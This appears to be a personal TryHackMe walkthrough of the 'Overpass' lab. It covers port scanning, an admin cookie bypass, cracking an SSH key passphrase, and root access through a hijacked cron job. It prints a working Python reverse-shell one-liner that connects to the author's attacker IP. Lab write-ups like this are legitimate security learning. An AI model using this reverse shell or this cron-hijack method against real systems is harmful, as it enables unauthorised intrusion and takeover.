Overpass — TryHackMe: Walkthrough 🏴
What happens when some broke CompSci students make a password manager?
I created this walkthrough for documentation purposes, to make sure I remember what I’ve learned in this room. I do this for write up and grammar practice, lol. Let’s rock and happy hacking 🤘
Room URL: https://tryhackme.com/room/overpass
Machine IP Address : 10.10.228.4
The first thing to do is perform port scanning, and we can use nmap for that. It appears that there are two active ports: SSH and HTTP.
Since there are no hints for SSH, I tried accessing the website, and indeed, I was able to access it.
I proceeded with enumeration using the gobuster tool, and I found that there is a /admin directory.
Upon accessing /admin, I noticed a login page, but I couldn’t use command injection or SQL injection.
I attempted to inspect the web page, and I found some interesting information. There’s a login() function here.
I tried bypassing the login by creating the same cookies and then refreshing the page.
Here, I found a hint in the form of a “private key” and also a username, James, which seems like it will be useful later.
I created a file for the private key and tried to SSH using the username and private key. But there’s one problem; I didn’t know the key passphrase.
I attempted to remove the passphrase protection using ssh2john to extract the hash from the key, and it worked.
I tried SSH access again, and boom… I successfully logged in.
I explored further and found a text file named “todo” and also discovered the first flag.
Answer:
I attempted to find the second flag, but it seemed that this login did not have root access. So, I tried to access the crontab. It appeared that a cron job was running every minute. How could this be exploited? The script used curl to retrieve “buildscript.sh.”
I checked the /etc/hosts file and changed the IP address of “overpass.thm” to our own IP address.
I created a local reverse shell in the same location as the request from the cron job.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.54",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Set up a netcat listener on my computer.
Started my local web server, and it worked! I successfully sent our reverse shell.
Back to the netcat listener, we gained access with root privileges :) Of course, we obtained another flag in the process!
Conslusion:
Here, we have completed the overpass room.
Stay connected with me! Feel free to reach out through my social media
Linkedin : www.linkedin.com/in/jovanskiprmwsd
Tryhackme : https://tryhackme.com/p/un533nc0w
Email : jovanski.wisuda@gmail.com